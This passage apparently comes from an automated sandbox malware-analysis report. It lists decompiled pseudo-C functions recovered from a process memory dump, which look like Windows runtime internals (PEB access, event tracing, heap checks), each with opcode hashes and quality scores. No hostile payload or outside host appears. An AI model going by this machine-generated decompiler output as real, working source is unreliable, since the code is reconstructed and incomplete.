                                          				_t27 = __ebx;
                                          				_v8 =  *0x100d360 ^ _t35;
                                          				_t33 = __edx;
                                          				_t34 = __ecx;
                                          				E00F5FA60( &_v60, 0, 0x30);
                                          				_v20 = _a4;
                                          				_v16 = _a8;
                                          				_v28 = _t34;
                                          				_v24 = _t33;
                                          				_v54 = 0x1034;
                                          				if(E00F37D50() == 0) {
                                          					_t21 = 0x7ffe0388;
                                          				} else {
                                          					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          				}
                                          				_push( &_v60);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t21 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                          			}


















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 59248f02b8359f32961b09f3ee93d7e7e18c993ae1481be5a444221e43798fae
                                          • Instruction ID: 38374c8da0c4b2f0661b3c6b06bb9658c1769cb05ba956084c2d94e8a84917e2
                                          • Opcode Fuzzy Hash: 59248f02b8359f32961b09f3ee93d7e7e18c993ae1481be5a444221e43798fae
                                          • Instruction Fuzzy Hash: 7D018071A00248ABDB14EFA8D842FAEB7B8EF44710F044066B904EB381D678DA04DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 61%
                                          			E00FD138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				short _v54;
                                          				char _v60;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char* _t21;
                                          				intOrPtr _t27;
                                          				intOrPtr _t33;
                                          				intOrPtr _t34;
                                          				signed int _t35;
                                          
                                          				_t32 = __edx;
                                          				_t27 = __ebx;
                                          				_v8 =  *0x100d360 ^ _t35;
                                          				_t33 = __edx;
                                          				_t34 = __ecx;
                                          				E00F5FA60( &_v60, 0, 0x30);
                                          				_v20 = _a4;
                                          				_v16 = _a8;
                                          				_v28 = _t34;
                                          				_v24 = _t33;
                                          				_v54 = 0x1033;
                                          				if(E00F37D50() == 0) {
                                          					_t21 = 0x7ffe0388;
                                          				} else {
                                          					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          				}
                                          				_push( &_v60);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t21 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                          			}


















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e9006f82b2cc1bfca64fa9d26bfcdc31dfc2e43d1fe635a3885dd7405ee02bf
                                          • Instruction ID: a828ce68fd6ac260f3b49bb201960a218700f70f8ffd9be99afbbd77bc1e5d2d
                                          • Opcode Fuzzy Hash: 3e9006f82b2cc1bfca64fa9d26bfcdc31dfc2e43d1fe635a3885dd7405ee02bf
                                          • Instruction Fuzzy Hash: 5A015271E04218AFCB14EFA9D842FAEB7B8EF44710F044066BD04EB381D679DA05D795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E00F158EC(intOrPtr __ecx) {
                                          				signed int _v8;
                                          				char _v28;
                                          				char _v44;
                                          				char _v76;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr _t10;
                                          				intOrPtr _t16;
                                          				intOrPtr _t17;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				signed int _t29;
                                          
                                          				_v8 =  *0x100d360 ^ _t29;
                                          				_t10 =  *[fs:0x30];
                                          				_t27 = __ecx;
                                          				if(_t10 == 0) {
                                          					L6:
                                          					_t28 = 0xef5c80;
                                          				} else {
                                          					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                          					if(_t16 == 0) {
                                          						goto L6;
                                          					} else {
                                          						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                          					}
                                          				}
                                          				if(E00F15943() != 0 &&  *0x1005320 > 5) {
                                          					E00F97B5E( &_v44, _t27);
                                          					_t22 =  &_v28;
                                          					E00F97B5E( &_v28, _t28);
                                          					_t11 = E00F97B9C(0x1005320, 0xefbf15,  &_v28, _t22, 4,  &_v76);
                                          				}
                                          				return E00F5B640(_t11, _t17, _v8 ^ _t29, 0xefbf15, _t27, _t28);
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e42e6002bde6dd8689cc12a01e7a9aec410fccb4ec5481e1457cf1c4d2a2ab5
                                          • Instruction ID: fed1db79ba733aeb25dcc31f94707644b6c975157878abb0ba5fab92dc1a759f
                                          • Opcode Fuzzy Hash: 3e42e6002bde6dd8689cc12a01e7a9aec410fccb4ec5481e1457cf1c4d2a2ab5
                                          • Instruction Fuzzy Hash: F701F732A00A08DBDB14EF79CC019FE77A8EFC0B30F954069A905A7245DE31DD45E791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00FE1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                          				char _v8;
                                          				void* _v11;
                                          				unsigned int _v12;
                                          				void* _v15;
                                          				void* __esi;
                                          				void* __ebp;
                                          				char* _t16;
                                          				signed int* _t35;
                                          
                                          				_t22 = __ebx;
                                          				_t35 = __ecx;
                                          				_v8 = __edx;
                                          				_t13 =  !( *__ecx) + 1;
                                          				_v12 =  !( *__ecx) + 1;
                                          				if(_a4 != 0) {
                                          					E00FE165E(__ebx, 0x1008ae4, (__edx -  *0x1008b04 >> 0x14) + (__edx -  *0x1008b04 >> 0x14), __edi, __ecx, (__edx -  *0x1008b04 >> 0x14) + (__edx -  *0x1008b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                          				}
                                          				E00FDAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                          				if(E00F37D50() == 0) {
                                          					_t16 = 0x7ffe0388;
                                          				} else {
                                          					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          				}
                                          				if( *_t16 != 0) {
                                          					_t16 = E00FCFE3F(_t22, _t35, _v8, _v12);
                                          				}
                                          				return _t16;
                                          			}












                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e3cbc8ec1c7ea2bf794a0e9742faf4962194de25f0cad7db90dd124e544d1cd
                                          • Instruction ID: 1b8f8bc8833df5991529293e2d09b55488c45087b157db5c82ce8c86c1fd422a
                                          • Opcode Fuzzy Hash: 3e3cbc8ec1c7ea2bf794a0e9742faf4962194de25f0cad7db90dd124e544d1cd
                                          • Instruction Fuzzy Hash: 2D014C729047819FC721EF2ACD01B1B77D5BBC4320F04C529F98583691DE34D984EB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F2B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                          				signed char _t11;
                                          				signed char* _t12;
                                          				intOrPtr _t24;
                                          				signed short* _t25;
                                          
                                          				_t25 = __edx;
                                          				_t24 = __ecx;
                                          				_t11 = ( *[fs:0x30])[0x50];
                                          				if(_t11 != 0) {
                                          					if( *_t11 == 0) {
                                          						goto L1;
                                          					}
                                          					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                          					L2:
                                          					if( *_t12 != 0) {
                                          						_t12 =  *[fs:0x30];
                                          						if((_t12[0x240] & 0x00000004) == 0) {
                                          							goto L3;
                                          						}
                                          						if(E00F37D50() == 0) {
                                          							_t12 = 0x7ffe0385;
                                          						} else {
                                          							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                          						}
                                          						if(( *_t12 & 0x00000020) == 0) {
                                          							goto L3;
                                          						}
                                          						return E00F97016(_a4, _t24, 0, 0, _t25, 0);
                                          					}
                                          					L3:
                                          					return _t12;
                                          				}
                                          				L1:
                                          				_t12 = 0x7ffe0384;
                                          				goto L2;
                                          			}








                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction ID: 0208ddc6f83920904712753a2bafd87b584b7b49cdd219e7470a1165c05476a2
                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction Fuzzy Hash: 140171726046849FD326D75CD944F6B77E8EB85760F0D40A1F919CB651D728DC40E622
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E00FCFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v12;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				short _v58;
                                          				char _v64;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char* _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          
                                          				_t29 = __edx;
                                          				_t24 = __ebx;
                                          				_v12 =  *0x100d360 ^ _t32;
                                          				_t30 = __edx;
                                          				_t31 = __ecx;
                                          				E00F5FA60( &_v64, 0, 0x30);
                                          				_v24 = _a4;
                                          				_v32 = _t31;
                                          				_v28 = _t30;
                                          				_v58 = 0x266;
                                          				if(E00F37D50() == 0) {
                                          					_t18 = 0x7ffe0388;
                                          				} else {
                                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          				}
                                          				_push( &_v64);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t18 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                          			}

















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f007eecb2026e7eb8586d7c063e1ff406d228f179fc549d8f8d4ce4170ac848
                                          • Instruction ID: a1fc1a41500d14570e7524156687bb1926383abefef2a5d2bba418c4c8a0207b
                                          • Opcode Fuzzy Hash: 1f007eecb2026e7eb8586d7c063e1ff406d228f179fc549d8f8d4ce4170ac848
                                          • Instruction Fuzzy Hash: 22018871E00208ABC714DBA9D846FAEB7B8EF44710F00406ABD009B291DA74D905D795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E00FCFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v12;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				short _v58;
                                          				char _v64;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char* _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          
                                          				_t29 = __edx;
                                          				_t24 = __ebx;
                                          				_v12 =  *0x100d360 ^ _t32;
                                          				_t30 = __edx;
                                          				_t31 = __ecx;
                                          				E00F5FA60( &_v64, 0, 0x30);
                                          				_v24 = _a4;
                                          				_v32 = _t31;
                                          				_v28 = _t30;
                                          				_v58 = 0x267;
                                          				if(E00F37D50() == 0) {
                                          					_t18 = 0x7ffe0388;
                                          				} else {
                                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          				}
                                          				_push( &_v64);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t18 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                          			}

















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5256f723560ac1e2ac178102c02091b46b8c56fe33f21e086d34d1c9abc95b73
                                          • Instruction ID: 71696c9d24a1256746853d7f9783451606d285a5767c6504ce591c92967be606
                                          • Opcode Fuzzy Hash: 5256f723560ac1e2ac178102c02091b46b8c56fe33f21e086d34d1c9abc95b73
                                          • Instruction Fuzzy Hash: 57018871E04218ABC714EFA9D846FAEB7B8EF44710F004066BD009B291DA74DA05D7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E00FE8ED6(intOrPtr __ecx, intOrPtr __edx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				short _v62;
                                          				char _v68;
                                          				signed char* _t29;
                                          				intOrPtr _t35;
                                          				intOrPtr _t41;
                                          				intOrPtr _t42;
                                          				signed int _t43;
                                          
                                          				_t40 = __edx;
                                          				_v8 =  *0x100d360 ^ _t43;
                                          				_v28 = __ecx;
                                          				_v62 = 0x1c2a;
                                          				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                          				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                          				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                          				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                          				_v24 = __edx;
                                          				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                          				if(E00F37D50() == 0) {
                                          					_t29 = 0x7ffe0386;
                                          				} else {
                                          					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v68);
                                          				_push(0x1c);
                                          				_push(0x20402);
                                          				_push( *_t29 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                          			}



















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd47f8725ee1109c65a8b7bd45582677c1d0c1148760b418a2225d7a1e466795
                                          • Instruction ID: ce111bafc4ffdc04ea76724537c0d43bc118ec65963842146a5185a283c707af
                                          • Opcode Fuzzy Hash: dd47f8725ee1109c65a8b7bd45582677c1d0c1148760b418a2225d7a1e466795
                                          • Instruction Fuzzy Hash: E0111270D042499FD704DFA9D441BADB7F4FF08300F1442A6E918EB342D7389941DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E00FE8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v12;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				short _v66;
                                          				char _v72;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char* _t18;
                                          				signed int _t32;
                                          
                                          				_t29 = __edx;
                                          				_v12 =  *0x100d360 ^ _t32;
                                          				_t31 = _a8;
                                          				_t30 = _a12;
                                          				_v66 = 0x1c20;
                                          				_v40 = __ecx;
                                          				_v36 = __edx;
                                          				_v32 = _a4;
                                          				_v28 = _a8;
                                          				_v24 = _a12;
                                          				if(E00F37D50() == 0) {
                                          					_t18 = 0x7ffe0386;
                                          				} else {
                                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v72);
                                          				_push(0x14);
                                          				_push(0x20402);
                                          				_push( *_t18 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                          			}

















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 74757960ddd3076057c5c930030979706e81c9f04c6a6eab49d42ebae6335060
                                          • Instruction ID: ac64bbec2f0d7750318191d35e1a76f9be8e7e248a2aa2878bb2bc2a254a9c1f
                                          • Opcode Fuzzy Hash: 74757960ddd3076057c5c930030979706e81c9f04c6a6eab49d42ebae6335060
                                          • Instruction Fuzzy Hash: F3012171A0021CAFCB04EFA9D9419AEB7B8EF48750F10405AF904E7341DB38A901DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F1DB60(signed int __ecx) {
                                          				intOrPtr* _t9;
                                          				void* _t12;
                                          				void* _t13;
                                          				intOrPtr _t14;
                                          
                                          				_t9 = __ecx;
                                          				_t14 = 0;
                                          				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                          					_t13 = 0xc000000d;
                                          				} else {
                                          					_t14 = E00F1DB40();
                                          					if(_t14 == 0) {
                                          						_t13 = 0xc0000017;
                                          					} else {
                                          						_t13 = E00F1E7B0(__ecx, _t12, _t14, 0xfff);
                                          						if(_t13 < 0) {
                                          							L00F1E8B0(__ecx, _t14, 0xfff);
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                          							_t14 = 0;
                                          						} else {
                                          							_t13 = 0;
                                          							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                          						}
                                          					}
                                          				}
                                          				 *_t9 = _t14;
                                          				return _t13;
                                          			}








                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F1B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                          				signed char* _t13;
                                          				intOrPtr _t22;
                                          				char _t23;
                                          
                                          				_t23 = __edx;
                                          				_t22 = __ecx;
                                          				if(E00F37D50() != 0) {
                                          					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                          				} else {
                                          					_t13 = 0x7ffe0384;
                                          				}
                                          				if( *_t13 != 0) {
                                          					_t13 =  *[fs:0x30];
                                          					if((_t13[0x240] & 0x00000004) == 0) {
                                          						goto L3;
                                          					}
                                          					if(E00F37D50() == 0) {
                                          						_t13 = 0x7ffe0385;
                                          					} else {
                                          						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                          					}
                                          					if(( *_t13 & 0x00000020) == 0) {
                                          						goto L3;
                                          					}
                                          					return E00F97016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                          				} else {
                                          					L3:
                                          					return _t13;
                                          				}
                                          			}







                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 48%
                                          			E00FE8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				short _v50;
                                          				char _v56;
                                          				signed char* _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          
                                          				_t29 = __edx;
                                          				_v8 =  *0x100d360 ^ _t32;
                                          				_v16 = __ecx;
                                          				_v50 = 0x1c2c;
                                          				_v24 = _a4;
                                          				_v20 = _a8;
                                          				_v12 = __edx;
                                          				if(E00F37D50() == 0) {
                                          					_t18 = 0x7ffe0386;
                                          				} else {
                                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v56);
                                          				_push(0x10);
                                          				_push(0x402);
                                          				_push( *_t18 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 48%
                                          			E00FD131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				short _v50;
                                          				char _v56;
                                          				signed char* _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          
                                          				_t29 = __edx;
                                          				_v8 =  *0x100d360 ^ _t32;
                                          				_v20 = _a4;
                                          				_v12 = _a8;
                                          				_v24 = __ecx;
                                          				_v16 = __edx;
                                          				_v50 = 0x1021;
                                          				if(E00F37D50() == 0) {
                                          					_t18 = 0x7ffe0380;
                                          				} else {
                                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				}
                                          				_push( &_v56);
                                          				_push(0x10);
                                          				_push(0x20402);
                                          				_push( *_t18 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E00FD1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				short _v46;
                                          				char _v52;
                                          				signed char* _t15;
                                          				intOrPtr _t21;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				signed int _t29;
                                          
                                          				_t26 = __edx;
                                          				_v8 =  *0x100d360 ^ _t29;
                                          				_v12 = _a4;
                                          				_v20 = __ecx;
                                          				_v16 = __edx;
                                          				_v46 = 0x1024;
                                          				if(E00F37D50() == 0) {
                                          					_t15 = 0x7ffe0380;
                                          				} else {
                                          					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				}
                                          				_push( &_v52);
                                          				_push(0xc);
                                          				_push(0x20402);
                                          				_push( *_t15 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                          			}















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F3C577(void* __ecx, char _a4) {
                                          				void* __esi;
                                          				void* __ebp;
                                          				void* _t17;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t21;
                                          
                                          				_t18 = __ecx;
                                          				_t21 = __ecx;
                                          				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E00F3C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xef11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                          					__eflags = _a4;
                                          					if(__eflags != 0) {
                                          						L10:
                                          						E00FE88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                          						L9:
                                          						return 0;
                                          					}
                                          					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                          					if(__eflags == 0) {
                                          						goto L10;
                                          					}
                                          					goto L9;
                                          				} else {
                                          					return 1;
                                          				}
                                          			}










                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E00FD2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                          				void* __esi;
                                          				signed char _t3;
                                          				signed char _t7;
                                          				void* _t19;
                                          
                                          				_t17 = __ecx;
                                          				_t3 = E00FCFD22(__ecx);
                                          				_t19 =  *0x100849c - _t3; // 0x429505b0
                                          				if(_t19 == 0) {
                                          					__eflags = _t17 -  *0x1008748; // 0x0
                                          					if(__eflags <= 0) {
                                          						E00FD1C06();
                                          						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                          						__eflags = _t3;
                                          						if(_t3 != 0) {
                                          							L5:
                                          							__eflags =  *0x1008724 & 0x00000004;
                                          							if(( *0x1008724 & 0x00000004) == 0) {
                                          								asm("int3");
                                          								return _t3;
                                          							}
                                          						} else {
                                          							_t3 =  *0x7ffe02d4 & 0x00000003;
                                          							__eflags = _t3 - 3;
                                          							if(_t3 == 3) {
                                          								goto L5;
                                          							}
                                          						}
                                          					}
                                          					return _t3;
                                          				} else {
                                          					_t7 =  *0x1008724; // 0x0
                                          					return E00FC8DF1(__ebx, 0xc0000374, 0x1005890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                          				}
                                          			}








                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 43%
                                          			E00FE8D34(intOrPtr __ecx, intOrPtr __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				short _v42;
                                          				char _v48;
                                          				signed char* _t12;
                                          				intOrPtr _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr _t25;
                                          				signed int _t26;
                                          
                                          				_t23 = __edx;
                                          				_v8 =  *0x100d360 ^ _t26;
                                          				_v16 = __ecx;
                                          				_v42 = 0x1c2b;
                                          				_v12 = __edx;
                                          				if(E00F37D50() == 0) {
                                          					_t12 = 0x7ffe0386;
                                          				} else {
                                          					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v48);
                                          				_push(8);
                                          				_push(0x20402);
                                          				_push( *_t12 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E00F5927A(void* __ecx) {
                                          				signed int _t11;
                                          				void* _t14;
                                          
                                          				_t11 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                          				if(_t11 != 0) {
                                          					E00F5FA60(_t11, 0, 0x98);
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                          					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                          					E00F592C6(_t11, _t14);
                                          				}
                                          				return _t11;
                                          			}






                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 36%
                                          			E00FE8CD6(intOrPtr __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				short _v38;
                                          				char _v44;
                                          				signed char* _t11;
                                          				intOrPtr _t17;
                                          				intOrPtr _t22;
                                          				intOrPtr _t23;
                                          				intOrPtr _t24;
                                          				signed int _t25;
                                          
                                          				_v8 =  *0x100d360 ^ _t25;
                                          				_v12 = __ecx;
                                          				_v38 = 0x1c2d;
                                          				if(E00F37D50() == 0) {
                                          					_t11 = 0x7ffe0386;
                                          				} else {
                                          					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          				}
                                          				_push( &_v44);
                                          				_push(0xffffffe4);
                                          				_push(0x402);
                                          				_push( *_t11 & 0x000000ff);
                                          				return E00F5B640(E00F59AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
